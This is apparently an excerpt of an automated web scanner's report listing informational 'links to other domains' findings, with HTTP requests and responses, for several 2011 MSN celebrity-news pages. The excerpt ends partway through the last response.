<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345080&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FDiddy-sued-for-%241-trillion.aspx%3Fcp-documentid%3D27455006&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Diddy+and+1+trillion&form=msnpop"><strong>
...[SNIP]...
<div>The rapper (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=p+diddy&go=&form=msnpop">photos</a>) reportedly is being sued for $1 trillion by a woman who claims he date-raped her. (Find out how much Sean ...<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=P+Diddy%27s+net+worth&form=msnpop">Diddy... Combs is worth</a>.) The disaster at the World Trade Center (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=World+Trade+Center&FORM=msnpop">photos</a>
...[SNIP]...
<div>In other Diddy news, he reportedly says he...d love to have a marriage like his friends. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=diddy+and+beyonce+inspiration&form=msnpop">Find out</a>
...[SNIP]...
<div>He...s going to play a detective on <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Diddy+and+Hawaii+Five-O&go=&form=msnpop">this TV series.</a>
...[SNIP]...
<div>Elton John defends hip-hop. Here...s <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Elton+John+and+hip+hop+and++phenomenon&form=msnpop">what he says.</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.305. http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx?cp-documentid=27455006

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=p+diddy&go=&form=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Diddy+and+1+trillion&form=msnpop
http://www.bing.com/search?q=Diddy+and+Hawaii+Five-O&go=&form=msnpop
http://www.bing.com/search?q=Elton+John+and+hip+hop+and++phenomenon&form=msnpop
http://www.bing.com/search?q=P+Diddy%27s+net+worth&form=msnpop
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=diddy+and+beyonce+inspiration&form=msnpop
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/search?q=World+Trade+Center&FORM=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406700&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FDiddy-sued-for-%241-trillion.aspx%3Fcp-documentid%3D27455006&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:20 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6da00a0abea248cba826f2c8b2499836; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=FF78F28A1E2140FEB4B72975B1E38A79; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:20 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406700&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FDiddy-sued-for-%241-trillion.aspx%3Fcp-documentid%3D27455006&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Diddy+and+1+trillion&form=msnpop"><strong>
...[SNIP]...
<div>The rapper (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=p+diddy&go=&form=msnpop">photos</a>) reportedly is being sued for $1 trillion by a woman who claims he date-raped her. (Find out how much Sean ...<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=P+Diddy%27s+net+worth&form=msnpop">Diddy... Combs is worth</a>.) The disaster at the World Trade Center (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=World+Trade+Center&FORM=msnpop">photos</a>
...[SNIP]...
<div>In other Diddy news, he reportedly says he...d love to have a marriage like his friends. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=diddy+and+beyonce+inspiration&form=msnpop">Find out</a>
...[SNIP]...
<div>He...s going to play a detective on <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Diddy+and+Hawaii+Five-O&go=&form=msnpop">this TV series.</a>
...[SNIP]...
<div>Elton John defends hip-hop. Here...s <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Elton+John+and+hip+hop+and++phenomenon&form=msnpop">what he says.</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.306. http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Famous-February-birthdays.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx?cp-documentid=27421108&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Famous+February+birthdays&form=msnhal
http://www.bing.com/search?q=ashton+kutcher+cheating+rumors&form=msnhal
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=michael+c+hall+jennifer+carpenter+divorce&FORM=msnhal
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406715&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FFamous-February-birthdays.aspx%3Fcp-documentid%3D27421108%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/Famous-February-birthdays.aspx?cp-documentid=27421108&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:35 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e6779a34e7084b25ac34e89e79c96cf9; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5B71CF800A144F299841AF3CCD2825DD; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:35 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 47907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406715&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FFamous-February-birthdays.aspx%3Fcp-documentid%3D27421108%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Famous+February+birthdays&form=msnhal"><strong>
...[SNIP]...
<div>What TV star recently <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=michael+c+hall+jennifer+carpenter+divorce&FORM=msnhal">filed for divorce</a>? Who's <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=ashton+kutcher+cheating+rumors&form=msnhal">rumored to have been cheating</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.307. http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Famous-February-birthdays.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx?cp-documentid=27421108&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Famous+February+birthdays&form=msnhal
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=ashton+kutcher+cheating+rumors&form=msnhal
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/search?q=michael+c+hall+jennifer+carpenter+divorce&FORM=msnhal
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345088&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FFamous-February-birthdays.aspx%3Fcp-documentid%3D27421108%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=90360dc9b02e433081fd7c5ed1d8d5ff; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=43595DDE06BC478BB4F3058AB1F86E37; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 47927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345088&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FFamous-February-birthdays.aspx%3Fcp-documentid%3D27421108%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Famous+February+birthdays&form=msnhal"><strong>
...[SNIP]...
<div>What TV star recently <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=michael+c+hall+jennifer+carpenter+divorce&FORM=msnhal">filed for divorce</a>? Who's <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=ashton+kutcher+cheating+rumors&form=msnhal">rumored to have been cheating</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.308. http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Jesse-James-ex-arrested.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx?cp-documentid=27467016

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=kat+von+d&qpvt=kat+von+d&FORM=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=janine+lindemulder+warrants&form=msnpop
http://www.bing.com/search?q=jesse+james%27+ex+wife+arrest&go=&form=msnpop
http://www.bing.com/search?q=jesse+james&form=msnpop
http://www.bing.com/search?q=jesse+james+engaged&form=msnpop
http://www.bing.com/search?q=lindemulder+three+warrants+jail&form=msnpop
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345084&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FJesse-James-ex-arrested.aspx%3Fcp-documentid%3D27467016&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/Jesse-James-ex-arrested.aspx?cp-documentid=27467016 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:24 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=19823443adb0450b96ef90e02cc8dbae; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
